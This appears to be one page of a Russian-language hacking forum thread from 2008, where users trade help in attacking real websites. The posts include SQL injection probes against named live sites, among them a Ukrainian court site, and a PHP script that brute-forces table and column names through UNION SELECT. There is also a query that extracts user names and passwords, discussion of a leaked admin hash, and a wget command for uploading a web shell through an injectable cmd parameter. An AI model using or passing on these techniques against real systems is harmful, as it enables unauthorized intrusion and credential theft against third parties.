Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 98 of 1207
  1. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.titan2.ru/press/?page=1&id=-107' это скуль..
    http://www.titan2.ru/press/?page=1&id=-107+order+by+1/* а вот это ?

    извините если такой вопрос уже был
     
    #1941 Gorev, 15 May 2008
  2. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Gorev, http://dev.mysql.com/doc/

    http://www.citforum.ru/howto/smart-questions-ru.shtml
     
    #1942 n0ne, 16 May 2008
    Last edited: 16 May 2008
  3. lastsmile

    lastsmile Elder - Старейшина

    Joined:
    22 Sep 2007
    Messages:
    40
    Likes Received:
    10
    Reputations:
    0
    я попробовал язык поменять и айди параметр в конце сделать, кароче вот:

    http://www.titan2.ru/press/?page=1&lang=en&id=

    а вот что-то дальше никак не получается((
     
    #1943 lastsmile, 16 May 2008
  4. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    lastsmile
    6 колонок, вывода нет, фильтр /*
     
    #1944 banned, 16 May 2008
  5. neon_fx

    neon_fx Elder - Старейшина

    Joined:
    22 Feb 2008
    Messages:
    74
    Likes Received:
    32
    Reputations:
    0
    Помогите раскрутить
    Них не выходит

    Вищий Господарський Суд України

    http://arbitr.gov.ua/news.php?lang=ukr&sub_section=1&news_id=129'
     
    #1945 neon_fx, 16 May 2008
    Last edited: 16 May 2008
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    столкнулся с такой проблемой
    admin:43e9a4ab75570f5b
     
    #1946 Gorev, 16 May 2008
  7. Полуночный Хэкер

    Полуночный Хэкер Banned

    Joined:
    15 May 2008
    Messages:
    5
    Likes Received:
    6
    Reputations:
    3
    Gorev, у вас пробелмы? www.narko-net.ru
     
    #1947 Полуночный Хэкер, 16 May 2008
    2 people like this.
  8. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    admin:admin
    Чё тут за проблема-то?
     
    #1948 S00pY, 16 May 2008
  9. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    admin:admin
    Чё тут за проблема-то?
    43e9a4ab75570f5b eto je ne MD5?
    P.S. ne podhodit pass admin admin
     
    #1949 Gorev, 16 May 2008
  10. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    Это Mysql !
    Пасс от баззыданных скорее всего а не от админки!
     
    #1950 S00pY, 16 May 2008
    1 person likes this.
  11. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Помоему 3 ветка, и union'а соответственно нет.Т е подзапросы:
    _http://www.titan2.ru/press/?page=1&id=106+and+substring(version(),1,1)=3
    _http://www.titan2.ru/press/?menu=199&page=1&id=107+and+substring(version(),1,1)=3
     
    #1951 Kakoytoxaker, 16 May 2008
    1 person likes this.
  12. На100ящий

    На100ящий Elder - Старейшина

    Joined:
    9 Jan 2008
    Messages:
    43
    Likes Received:
    1
    Reputations:
    0
    Люди, а есть у кого пхпкод подбора столбцов и колонок в Mysql????? Выложите плз...
     
    #1952 На100ящий, 16 May 2008
  13. Basurman

    Basurman Elder - Старейшина

    Joined:
    10 Nov 2006
    Messages:
    363
    Likes Received:
    271
    Reputations:
    29
    На100ящий
    В избранном прога от SQLHACK
    https://forum.antichat.ru/thread24918.html

    Gorev
    http://www.titan2.ru
    version() - 3.23.57
    user() - titan@localhost

    Ловить тебе там имхо нечего :)
     
    #1953 Basurman, 16 May 2008
  14. Велемир

    Велемир Banned

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Почему нечего? Угадывать и ещё раз угадывать:Р.
     
    #1954 Велемир, 16 May 2008
  15. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    nu eto esli v printzip postavit' poimet' site..
     
    #1955 Gorev, 16 May 2008
  16. На100ящий

    На100ящий Elder - Старейшина

    Joined:
    9 Jan 2008
    Messages:
    43
    Likes Received:
    1
    Reputations:
    0
    Basurman,
    Она правильно не определяет, нужен простой код пхп...сам писал и не получилось что то.... мож кто подскажет где ошибка???
    <?
    @set_time_limit(0);
    $strverno=file_get_contents("site/index.php?id=1+UNION+SELECT+1,2,3,4,5,6,7,8,9+from+pro.users+limit+1,1/*");
    preg_match_all("/<a href=\"(.+)\">(.+)<\/a>/isU",$strverno,$m);
    foreach($m[2] as $s){
    }
    $fd = fopen("kol.txt", "r");
    while(!feof($fd)) {
    $ma=trim(fgets($fd));
    $str=file_get_contents("site/index.php?id=1+UNION+SELECT+1,2,3,4,5,6,7,8,9+from+pro.".$ma."+limit+1,1/*");
    preg_match_all("/<a href=\"(.+)\">(.+)<\/a>/isU",$str,$p);
    foreach($p[2] as $k){
    }

    if($s==$k){
    echo "ok, exist";

    }
    else {
    echo "error";

    }
    }
    fclose($fd);
    ?>
     
    #1956 На100ящий, 16 May 2008
  17. XaCeRoC

    XaCeRoC Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    62
    Likes Received:
    23
    Reputations:
    -12
    Скажите плиз какзалить шелл имеется доступ к cmd серверн на linux'e , какой запрос составить чтоб закачать шелл http://www.site.com/news.php?cmd=команда для заливки шелла.
    За ранее блогадарен:)
     
    #1957 XaCeRoC, 16 May 2008
  18. desTiny

    desTiny Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    1,006
    Likes Received:
    444
    Reputations:
    94
    1)путь = pwd
    2)wget /Pпуть http://site.com/shell.txt
     
    #1958 desTiny, 16 May 2008
  19. Troll

    Troll New Member

    Joined:
    2 Feb 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Люди скажите плиз прогу или как вопше мона взломать вордовский фаил!? плиз очень надо! и если прога то дайте ссылку!Плз
     
    #1959 Troll, 16 May 2008
  20. neon_fx

    neon_fx Elder - Старейшина

    Joined:
    22 Feb 2008
    Messages:
    74
    Likes Received:
    32
    Reputations:
    0
    Если при вводе запроса
    forum=-1+UNION+SELECT+1,CONCAT_WS(char(58),name,pass),3,4+FROM+users+WHERE+name+NOT+IN+(0x74657374)/*

    выдает

    ?????????:123456789
    то с помощью какой функции можно преобразовать ??????
    плиз
     
    #1960 neon_fx, 16 May 2008
(You must log in or sign up to post here.)
Page 98 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.